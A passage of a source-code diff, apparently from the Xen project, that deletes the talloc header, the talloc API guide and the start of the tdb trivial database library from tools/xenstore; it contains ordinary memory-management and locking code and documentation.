*)talloc_check_name(ptr, #type) - -#define talloc_find_parent_bytype(ptr, type) (type *)talloc_find_parent_byname(ptr, #type) - - -#if TALLOC_DEPRECATED -#define talloc_zero_p(ctx, type) talloc_zero(ctx, type) -#define talloc_p(ctx, type) talloc(ctx, type) -#define talloc_array_p(ctx, type, count) talloc_array(ctx, type, count) -#define talloc_realloc_p(ctx, p, type, count) talloc_realloc(ctx, p, type, count) -#define talloc_destroy(ctx) talloc_free(ctx) -#endif - -#ifndef PRINTF_ATTRIBUTE -#if (__GNUC__ >= 3) -/** Use gcc attribute to check printf fns. a1 is the 1-based index of - * the parameter containing the format, and a2 the index of the first - * argument. Note that some gcc 2.x versions don't handle this - * properly **/ -#define PRINTF_ATTRIBUTE(a1, a2) __attribute__ ((format (__printf__, a1, a2))) -#else -#define PRINTF_ATTRIBUTE(a1, a2) -#endif -#endif - - -/* The following definitions come from talloc.c */ -void *_talloc(const void *context, size_t size); -void talloc_set_destructor(const void *ptr, int (*destructor)(void *)); -void talloc_increase_ref_count(const void *ptr); -void *talloc_reference(const void *context, const void *ptr); -int talloc_unlink(const void *context, void *ptr); -void talloc_set_name(const void *ptr, const char *fmt, ...) PRINTF_ATTRIBUTE(2,3); -void talloc_set_name_const(const void *ptr, const char *name); -void *talloc_named(const void *context, size_t size, - const char *fmt, ...) PRINTF_ATTRIBUTE(3,4); -void *talloc_named_const(const void *context, size_t size, const char *name); -const char *talloc_get_name(const void *ptr); -void *talloc_check_name(const void *ptr, const char *name); -void talloc_report_depth(const void *ptr, FILE *f, int depth); -void *talloc_parent(const void *ptr); -void *talloc_init(const char *fmt, ...) PRINTF_ATTRIBUTE(1,2); -int talloc_free(void *ptr); -void *_talloc_realloc(const void *context, void *ptr, size_t size, const char *name); -void *talloc_steal(const void *new_ctx, const void *ptr); -off_t talloc_total_size(const void *ptr); -off_t talloc_total_blocks(const void *ptr); -void talloc_report_full(const void *ptr, FILE *f); -void talloc_report(const void *ptr, FILE *f); -void talloc_enable_null_tracking(void); -void talloc_enable_leak_report(void); -void talloc_enable_leak_report_full(void); -void *_talloc_zero(const void *ctx, size_t size, const char *name); -void *_talloc_memdup(const void *t, const void *p, size_t size, const char *name); -char *talloc_strdup(const void *t, const char *p); -char *talloc_strndup(const void *t, const char *p, size_t n); -char *talloc_append_string(const void *t, char *orig, const char *append); -char *talloc_vasprintf(const void *t, const char *fmt, va_list ap) PRINTF_ATTRIBUTE(2,0); -char *talloc_asprintf(const void *t, const char *fmt, ...) PRINTF_ATTRIBUTE(2,3); -char *talloc_asprintf_append(char *s, - const char *fmt, ...) PRINTF_ATTRIBUTE(2,3); -void *_talloc_array(const void *ctx, size_t el_size, unsigned count, const char *name); -void *_talloc_zero_array(const void *ctx, size_t el_size, unsigned count, const char *name); -void *_talloc_realloc_array(const void *ctx, void *ptr, size_t el_size, unsigned count, const char *name); -void *talloc_realloc_fn(const void *context, void *ptr, size_t size); -void *talloc_autofree_context(void); -size_t talloc_get_size(const void *ctx); -void *talloc_find_parent_byname(const void *ctx, const char *name); -void talloc_show_parents(const void *context, FILE *file); - -#endif - diff -r 10a8fae412c5 tools/xenstore/talloc_guide.txt --- a/tools/xenstore/talloc_guide.txt Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,569 +0,0 @@ -Using talloc in Samba4 ----------------------- - -Andrew Tridgell -September 2004 - -The most current version of this document is available at - http://samba.org/ftp/unpacked/samba4/source/lib/talloc/talloc_guide.txt - -If you are used to talloc from Samba3 then please read this carefully, -as talloc has changed a lot. - -The new talloc is a hierarchical, reference counted memory pool system -with destructors. Quite a mounthful really, but not too bad once you -get used to it. - -Perhaps the biggest change from Samba3 is that there is no distinction -between a "talloc context" and a "talloc pointer". Any pointer -returned from talloc() is itself a valid talloc context. This means -you can do this: - - struct foo *X = talloc(mem_ctx, struct foo); - X->name = talloc_strdup(X, "foo"); - -and the pointer X->name would be a "child" of the talloc context "X" -which is itself a child of mem_ctx. So if you do talloc_free(mem_ctx) -then it is all destroyed, whereas if you do talloc_free(X) then just X -and X->name are destroyed, and if you do talloc_free(X->name) then -just the name element of X is destroyed. - -If you think about this, then what this effectively gives you is an -n-ary tree, where you can free any part of the tree with -talloc_free(). - -If you find this confusing, then I suggest you run the testsuite to -watch talloc in action. You may also like to add your own tests to -testsuite.c to clarify how some particular situation is handled. - - -Performance ------------ - -All the additional features of talloc() over malloc() do come at a -price. We have a simple performance test in Samba4 that measures -talloc() versus malloc() performance, and it seems that talloc() is -about 10% slower than malloc() on my x86 Debian Linux box. For Samba, -the great reduction in code complexity that we get by using talloc -makes this worthwhile, especially as the total overhead of -talloc/malloc in Samba is already quite small. - - -talloc API ----------- - -The following is a complete guide to the talloc API. Read it all at -least twice. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -(type *)talloc(const void *context, type); - -The talloc() macro is the core of the talloc library. It takes a -memory context and a type, and returns a pointer to a new area of -memory of the given type. - -The returned pointer is itself a talloc context, so you can use it as -the context argument to more calls to talloc if you wish. - -The returned pointer is a "child" of the supplied context. This means -that if you talloc_free() the context then the new child disappears as -well. Alternatively you can free just the child. - -The context argument to talloc() can be NULL, in which case a new top -level context is created. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_size(const void *context, size_t size); - -The function talloc_size() should be used when you don't have a -convenient type to pass to talloc(). Unlike talloc(), it is not type -safe (as it returns a void *), so you are on your own for type checking. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -int talloc_free(void *ptr); - -The talloc_free() function frees a piece of talloc memory, and all its -children. You can call talloc_free() on any pointer returned by -talloc(). - -The return value of talloc_free() indicates success or failure, with 0 -returned for success and -1 for failure. The only possible failure -condition is if the pointer had a destructor attached to it and the -destructor returned -1. See talloc_set_destructor() for details on -destructors. - -If this pointer has an additional parent when talloc_free() is called -then the memory is not actually released, but instead the most -recently established parent is destroyed. See talloc_reference() for -details on establishing additional parents. - -For more control on which parent is removed, see talloc_unlink() - -talloc_free() operates recursively on its children. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -int talloc_free_children(void *ptr); - -The talloc_free_children() walks along the list of all children of a -talloc context and talloc_free()s only the children, not the context -itself. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_reference(const void *context, const void *ptr); - -The talloc_reference() function makes "context" an additional parent -of "ptr". - -The return value of talloc_reference() is always the original pointer -"ptr", unless talloc ran out of memory in creating the reference in -which case it will return NULL (each additional reference consumes -around 48 bytes of memory on intel x86 platforms). - -If "ptr" is NULL, then the function is a no-op, and simply returns NULL. - -After creating a reference you can free it in one of the following -ways: - - - you can talloc_free() any parent of the original pointer. That - will reduce the number of parents of this pointer by 1, and will - cause this pointer to be freed if it runs out of parents. - - - you can talloc_free() the pointer itself. That will destroy the - most recently established parent to the pointer and leave the - pointer as a child of its current parent. - -For more control on which parent to remove, see talloc_unlink() - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -int talloc_unlink(const void *context, const void *ptr); - -The talloc_unlink() function removes a specific parent from ptr. The -context passed must either be a context used in talloc_reference() -with this pointer, or must be a direct parent of ptr. - -Note that if the parent has already been removed using talloc_free() -then this function will fail and will return -1. Likewise, if "ptr" -is NULL, then the function will make no modifications and return -1. - -Usually you can just use talloc_free() instead of talloc_unlink(), but -sometimes it is useful to have the additional control on which parent -is removed. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_set_destructor(const void *ptr, int (*destructor)(void *)); - -The function talloc_set_destructor() sets the "destructor" for the -pointer "ptr". A destructor is a function that is called when the -memory used by a pointer is about to be released. The destructor -receives the pointer as an argument, and should return 0 for success -and -1 for failure. - -The destructor can do anything it wants to, including freeing other -pieces of memory. A common use for destructors is to clean up -operating system resources (such as open file descriptors) contained -in the structure the destructor is placed on. - -You can only place one destructor on a pointer. If you need more than -one destructor then you can create a zero-length child of the pointer -and place an additional destructor on that. - -To remove a destructor call talloc_set_destructor() with NULL for the -destructor. - -If your destructor attempts to talloc_free() the pointer that it is -the destructor for then talloc_free() will return -1 and the free will -be ignored. This would be a pointless operation anyway, as the -destructor is only called when the memory is just about to go away. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_increase_ref_count(const void *ptr); - -The talloc_increase_ref_count(ptr) function is exactly equivalent to: - - talloc_reference(NULL, ptr); - -You can use either syntax, depending on which you think is clearer in -your code. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_set_name(const void *ptr, const char *fmt, ...); - -Each talloc pointer has a "name". The name is used principally for -debugging purposes, although it is also possible to set and get the -name on a pointer in as a way of "marking" pointers in your code. - -The main use for names on pointer is for "talloc reports". See -talloc_report() and talloc_report_full() for details. Also see -talloc_enable_leak_report() and talloc_enable_leak_report_full(). - -The talloc_set_name() function allocates memory as a child of the -pointer. It is logically equivalent to: - talloc_set_name_const(ptr, talloc_asprintf(ptr, fmt, ...)); - -Note that multiple calls to talloc_set_name() will allocate more -memory without releasing the name. All of the memory is released when -the ptr is freed using talloc_free(). - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_set_name_const(const void *ptr, const char *name); - -The function talloc_set_name_const() is just like talloc_set_name(), -but it takes a string constant, and is much faster. It is extensively -used by the "auto naming" macros, such as talloc_p(). - -This function does not allocate any memory. It just copies the -supplied pointer into the internal representation of the talloc -ptr. This means you must not pass a name pointer to memory that will -disappear before the ptr is freed with talloc_free(). - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_named(const void *context, size_t size, const char *fmt, ...); - -The talloc_named() function creates a named talloc pointer. It is -equivalent to: - - ptr = talloc_size(context, size); - talloc_set_name(ptr, fmt, ....); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_named_const(const void *context, size_t size, const char *name); - -This is equivalent to: - - ptr = talloc_size(context, size); - talloc_set_name_const(ptr, name); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -const char *talloc_get_name(const void *ptr); - -This returns the current name for the given talloc pointer. See -talloc_set_name() for details. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_init(const char *fmt, ...); - -This function creates a zero length named talloc context as a top -level context. It is equivalent to: - - talloc_named(NULL, 0, fmt, ...); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_new(void *ctx); - -This is a utility macro that creates a new memory context hanging -off an exiting context, automatically naming it "talloc_new: __location__" -where __location__ is the source line it is called from. It is -particularly useful for creating a new temporary working context. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -(type *)talloc_realloc(const void *context, void *ptr, type, count); - -The talloc_realloc() macro changes the size of a talloc -pointer. The "count" argument is the number of elements of type "type" -that you want the resulting pointer to hold. - -talloc_realloc() has the following equivalences: - - talloc_realloc(context, NULL, type, 1) ==> talloc(context, type); - talloc_realloc(context, NULL, type, N) ==> talloc_array(context, type, N); - talloc_realloc(context, ptr, type, 0) ==> talloc_free(ptr); - -The "context" argument is only used if "ptr" is not NULL, otherwise it -is ignored. - -talloc_realloc() returns the new pointer, or NULL on failure. The call -will fail either due to a lack of memory, or because the pointer has -more than one parent (see talloc_reference()). - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_realloc_size(const void *context, void *ptr, size_t size); - -the talloc_realloc_size() function is useful when the type is not -known so the typesafe talloc_realloc() cannot be used. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_steal(const void *new_ctx, const void *ptr); - -The talloc_steal() function changes the parent context of a talloc -pointer. It is typically used when the context that the pointer is -currently a child of is going to be freed and you wish to keep the -memory for a longer time. - -The talloc_steal() function returns the pointer that you pass it. It -does not have any failure modes. - -NOTE: It is possible to produce loops in the parent/child relationship -if you are not careful with talloc_steal(). No guarantees are provided -as to your sanity or the safety of your data if you do this. - -talloc_steal (new_ctx, NULL) will return NULL with no sideeffects. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -off_t talloc_total_size(const void *ptr); - -The talloc_total_size() function returns the total size in bytes used -by this pointer and all child pointers. Mostly useful for debugging. - -Passing NULL is allowed, but it will only give a meaningful result if -talloc_enable_leak_report() or talloc_enable_leak_report_full() has -been called. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -off_t talloc_total_blocks(const void *ptr); - -The talloc_total_blocks() function returns the total memory block -count used by this pointer and all child pointers. Mostly useful for -debugging. - -Passing NULL is allowed, but it will only give a meaningful result if -talloc_enable_leak_report() or talloc_enable_leak_report_full() has -been called. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_report(const void *ptr, FILE *f); - -The talloc_report() function prints a summary report of all memory -used by ptr. One line of report is printed for each immediate child of -ptr, showing the total memory and number of blocks used by that child. - -You can pass NULL for the pointer, in which case a report is printed -for the top level memory context, but only if -talloc_enable_leak_report() or talloc_enable_leak_report_full() has -been called. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_report_full(const void *ptr, FILE *f); - -This provides a more detailed report than talloc_report(). It will -recursively print the ensire tree of memory referenced by the -pointer. References in the tree are shown by giving the name of the -pointer that is referenced. - -You can pass NULL for the pointer, in which case a report is printed -for the top level memory context, but only if -talloc_enable_leak_report() or talloc_enable_leak_report_full() has -been called. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_enable_leak_report(void); - -This enables calling of talloc_report(NULL, stderr) when the program -exits. In Samba4 this is enabled by using the --leak-report command -line option. - -For it to be useful, this function must be called before any other -talloc function as it establishes a "null context" that acts as the -top of the tree. If you don't call this function first then passing -NULL to talloc_report() or talloc_report_full() won't give you the -full tree printout. - -Here is a typical talloc report: - -talloc report on 'null_context' (total 267 bytes in 15 blocks) - libcli/auth/spnego_parse.c:55 contains 31 bytes in 2 blocks - libcli/auth/spnego_parse.c:55 contains 31 bytes in 2 blocks - iconv(UTF8,CP850) contains 42 bytes in 2 blocks - libcli/auth/spnego_parse.c:55 contains 31 bytes in 2 blocks - iconv(CP850,UTF8) contains 42 bytes in 2 blocks - iconv(UTF8,UTF-16LE) contains 45 bytes in 2 blocks - iconv(UTF-16LE,UTF8) contains 45 bytes in 2 blocks - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_enable_leak_report_full(void); - -This enables calling of talloc_report_full(NULL, stderr) when the -program exits. In Samba4 this is enabled by using the ---leak-report-full command line option. - -For it to be useful, this function must be called before any other -talloc function as it establishes a "null context" that acts as the -top of the tree. If you don't call this function first then passing -NULL to talloc_report() or talloc_report_full() won't give you the -full tree printout. - -Here is a typical full report: - -full talloc report on 'root' (total 18 bytes in 8 blocks) - p1 contains 18 bytes in 7 blocks (ref 0) - r1 contains 13 bytes in 2 blocks (ref 0) - reference to: p2 - p2 contains 1 bytes in 1 blocks (ref 1) - x3 contains 1 bytes in 1 blocks (ref 0) - x2 contains 1 bytes in 1 blocks (ref 0) - x1 contains 1 bytes in 1 blocks (ref 0) - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void talloc_enable_null_tracking(void); - -This enables tracking of the NULL memory context without enabling leak -reporting on exit. Useful for when you want to do your own leak -reporting call via talloc_report_null_full(); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -(type *)talloc_zero(const void *ctx, type); - -The talloc_zero() macro is equivalent to: - - ptr = talloc(ctx, type); - if (ptr) memset(ptr, 0, sizeof(type)); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_zero_size(const void *ctx, size_t size) - -The talloc_zero_size() function is useful when you don't have a known type - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_memdup(const void *ctx, const void *p, size_t size); - -The talloc_memdup() function is equivalent to: - - ptr = talloc_size(ctx, size); - if (ptr) memcpy(ptr, p, size); - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -char *talloc_strdup(const void *ctx, const char *p); - -The talloc_strdup() function is equivalent to: - - ptr = talloc_size(ctx, strlen(p)+1); - if (ptr) memcpy(ptr, p, strlen(p)+1); - -This functions sets the name of the new pointer to the passed -string. This is equivalent to: - talloc_set_name_const(ptr, ptr) - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -char *talloc_strndup(const void *t, const char *p, size_t n); - -The talloc_strndup() function is the talloc equivalent of the C -library function strndup() - -This functions sets the name of the new pointer to the passed -string. This is equivalent to: - talloc_set_name_const(ptr, ptr) - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -char *talloc_vasprintf(const void *t, const char *fmt, va_list ap); - -The talloc_vasprintf() function is the talloc equivalent of the C -library function vasprintf() - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -char *talloc_asprintf(const void *t, const char *fmt, ...); - -The talloc_asprintf() function is the talloc equivalent of the C -library function asprintf() - -This functions sets the name of the new pointer to the passed -string. This is equivalent to: - talloc_set_name_const(ptr, ptr) - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -char *talloc_asprintf_append(char *s, const char *fmt, ...); - -The talloc_asprintf_append() function appends the given formatted -string to the given string. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -(type *)talloc_array(const void *ctx, type, uint_t count); - -The talloc_array() macro is equivalent to: - - (type *)talloc_size(ctx, sizeof(type) * count); - -except that it provides integer overflow protection for the multiply, -returning NULL if the multiply overflows. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_array_size(const void *ctx, size_t size, uint_t count); - -The talloc_array_size() function is useful when the type is not -known. It operates in the same way as talloc_array(), but takes a size -instead of a type. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_realloc_fn(const void *ctx, void *ptr, size_t size); - -This is a non-macro version of talloc_realloc(), which is useful -as libraries sometimes want a ralloc function pointer. A realloc() -implementation encapsulates the functionality of malloc(), free() and -realloc() in one call, which is why it is useful to be able to pass -around a single function pointer. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_autofree_context(void); - -This is a handy utility function that returns a talloc context -which will be automatically freed on program exit. This can be used -to reduce the noise in memory leak reports. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -void *talloc_check_name(const void *ptr, const char *name); - -This function checks if a pointer has the specified name. If it does -then the pointer is returned. It it doesn't then NULL is returned. - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -(type *)talloc_get_type(const void *ptr, type); - -This macro allows you to do type checking on talloc pointers. It is -particularly useful for void* private pointers. It is equivalent to -this: - - (type *)talloc_check_name(ptr, #type) - - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -talloc_set_type(const void *ptr, type); - -This macro allows you to force the name of a pointer to be a -particular type. This can be used in conjunction with -talloc_get_type() to do type checking on void* pointers. - -It is equivalent to this: - talloc_set_name_const(ptr, #type) - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -talloc_get_size(const void *ctx); - -This function lets you know the amount of memory alloced so far by -this context. It does NOT account for subcontext memory. -This can be used to calculate the size of an array. - diff -r 10a8fae412c5 tools/xenstore/tdb.c --- a/tools/xenstore/tdb.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,2151 +0,0 @@ - /* - Unix SMB/CIFS implementation. - - trivial database library - - Copyright (C) Andrew Tridgell 1999-2004 - Copyright (C) Paul `Rusty' Russell 2000 - Copyright (C) Jeremy Allison 2000-2003 - - ** NOTE! The following LGPL license applies to the tdb - ** library. This does NOT imply that all of Samba is released - ** under the LGPL - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - - -#ifndef _SAMBA_BUILD_ -#ifdef HAVE_CONFIG_H -#include -#endif - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include "tdb.h" -#include -#include "talloc.h" -#undef HAVE_MMAP -#else -#include "includes.h" -#include "lib/tdb/include/tdb.h" -#include "system/time.h" -#include "system/shmem.h" -#include "system/filesys.h" -#endif - -#define TDB_MAGIC_FOOD "TDB file\n" -#define TDB_VERSION (0x26011967 + 6) -#define TDB_MAGIC (0x26011999U) -#define TDB_FREE_MAGIC (~TDB_MAGIC) -#define TDB_DEAD_MAGIC (0xFEE1DEAD) -#define TDB_ALIGNMENT 4 -#define MIN_REC_SIZE (2*sizeof(struct list_struct) + TDB_ALIGNMENT) -#define DEFAULT_HASH_SIZE 131 -#define TDB_PAGE_SIZE 0x2000 -#define FREELIST_TOP (sizeof(struct tdb_header)) -#define TDB_ALIGN(x,a) (((x) + (a)-1) & ~((a)-1)) -#define TDB_BYTEREV(x) (((((x)&0xff)<<24)|((x)&0xFF00)<<8)|(((x)>>8)&0xFF00)|((x)>>24)) -#define TDB_DEAD(r) ((r)->magic == TDB_DEAD_MAGIC) -#define TDB_BAD_MAGIC(r) ((r)->magic != TDB_MAGIC && !TDB_DEAD(r)) -#define TDB_HASH_TOP(hash) (FREELIST_TOP + (BUCKET(hash)+1)*sizeof(tdb_off)) -#define TDB_DATA_START(hash_size) (TDB_HASH_TOP(hash_size-1)) - - -/* NB assumes there is a local variable called "tdb" that is the - * current context, also takes doubly-parenthesized print-style - * argument. */ -#define TDB_LOG(x) tdb->log_fn x - -/* lock offsets */ -#define GLOBAL_LOCK 0 -#define ACTIVE_LOCK 4 - -#ifndef MAP_FILE -#define MAP_FILE 0 -#endif - -#ifndef MAP_FAILED -#define MAP_FAILED ((void *)-1) -#endif - -#ifndef discard_const_p -# if defined(__intptr_t_defined) || defined(HAVE_INTPTR_T) -# define discard_const(ptr) ((void *)((intptr_t)(ptr))) -# else -# define discard_const(ptr) ((void *)(ptr)) -# endif -# define discard_const_p(type, ptr) ((type *)discard_const(ptr)) -#endif - -/* free memory if the pointer is valid and zero the pointer */ -#ifndef SAFE_FREE -#define SAFE_FREE(x) do { if ((x) != NULL) {talloc_free(discard_const_p(void *, (x))); (x)=NULL;} } while(0) -#endif - -#define BUCKET(hash) ((hash) % tdb->header.hash_size) -TDB_DATA tdb_null; - -/* all contexts, to ensure no double-opens (fcntl locks don't nest!) */ -static TDB_CONTEXT *tdbs = NULL; - -static int tdb_munmap(TDB_CONTEXT *tdb) -{ - if (tdb->flags & TDB_INTERNAL) - return 0; - -#ifdef HAVE_MMAP - if (tdb->map_ptr) { - int ret = munmap(tdb->map_ptr, tdb->map_size); - if (ret != 0) - return ret; - } -#endif - tdb->map_ptr = NULL; - return 0; -} - -static void tdb_mmap(TDB_CONTEXT *tdb) -{ - if (tdb->flags & TDB_INTERNAL) - return; - -#ifdef HAVE_MMAP - if (!(tdb->flags & TDB_NOMMAP)) { - tdb->map_ptr = mmap(NULL, tdb->map_size, - PROT_READ|(tdb->read_only? 0:PROT_WRITE), - MAP_SHARED|MAP_FILE, tdb->fd, 0); - - /* - * NB. When mmap fails it returns MAP_FAILED *NOT* NULL !!!! - */ - - if (tdb->map_ptr == MAP_FAILED) { - tdb->map_ptr = NULL; - TDB_LOG((tdb, 2, "tdb_mmap failed for size %d (%s)\n", - tdb->map_size, strerror(errno))); - } - } else { - tdb->map_ptr = NULL; - } -#else - tdb->map_ptr = NULL; -#endif -} - -/* Endian conversion: we only ever deal with 4 byte quantities */ -static void *convert(void *buf, uint32_t size) -{ - uint32_t i, *p = buf; - for (i = 0; i < size / 4; i++) - p[i] = TDB_BYTEREV(p[i]); - return buf; -} -#define DOCONV() (tdb->flags & TDB_CONVERT) -#define CONVERT(x) (DOCONV() ? convert(&x, sizeof(x)) : &x) - -/* the body of the database is made of one list_struct for the free space - plus a separate data list for each hash value */ -struct list_struct { - tdb_off next; /* offset of the next record in the list */ - tdb_len rec_len; /* total byte length of record */ - tdb_len key_len; /* byte length of key */ - tdb_len data_len; /* byte length of data */ - uint32_t full_hash; /* the full 32 bit hash of the key */ - uint32_t magic; /* try to catch errors */ - /* the following union is implied: - union { - char record[rec_len]; - struct { - char key[key_len]; - char data[data_len]; - } - uint32_t totalsize; (tailer) - } - */ -}; - -/* a byte range locking function - return 0 on success - this functions locks/unlocks 1 byte at the specified offset. - - On error, errno is also set so that errors are passed back properly - through tdb_open(). */ -static int tdb_brlock(TDB_CONTEXT *tdb, tdb_off offset, - int rw_type, int lck_type, int probe) -{ - struct flock fl; - int ret; - - if (tdb->flags & TDB_NOLOCK) - return 0; - if ((rw_type == F_WRLCK) && (tdb->read_only)) { - errno = EACCES; - return -1; - } - - fl.l_type = rw_type; - fl.l_whence = SEEK_SET; - fl.l_start = offset; - fl.l_len = 1; - fl.l_pid = 0; - - do { - ret = fcntl(tdb->fd,lck_type,&fl); - } while (ret == -1 && errno == EINTR); - - if (ret == -1) { - if (!probe && lck_type != F_SETLK) { - /* Ensure error code is set for log fun to examine. */ - tdb->ecode = TDB_ERR_LOCK; - TDB_LOG((tdb, 5,"tdb_brlock failed (fd=%d) at offset %d rw_type=%d lck_type=%d\n", - tdb->fd, offset, rw_type, lck_type)); - } - /* Generic lock error. errno set by fcntl. - * EAGAIN is an expected return from non-blocking - * locks. */ - if (errno != EAGAIN) { - TDB_LOG((tdb, 5, "tdb_brlock failed (fd=%d) at offset %d rw_type=%d lck_type=%d: %s\n", - tdb->fd, offset, rw_type, lck_type, - strerror(errno))); - } - return TDB_ERRCODE(TDB_ERR_LOCK, -1); - } - return 0; -} - -/* lock a list in the database. list -1 is the alloc list */ -static int tdb_lock(TDB_CONTEXT *tdb, int list, int ltype) -{ - if (list < -1 || list >= (int)tdb->header.hash_size) { - TDB_LOG((tdb, 0,"tdb_lock: invalid list %d for ltype=%d\n", - list, ltype)); - return -1; - } - if (tdb->flags & TDB_NOLOCK) - return 0; - - /* Since fcntl locks don't nest, we do a lock for the first one, - and simply bump the count for future ones */ - if (tdb->locked[list+1].count == 0) { - if (tdb_brlock(tdb,FREELIST_TOP+4*list,ltype,F_SETLKW, 0)) { - TDB_LOG((tdb, 0,"tdb_lock failed on list %d ltype=%d (%s)\n", - list, ltype, strerror(errno))); - return -1; - } - 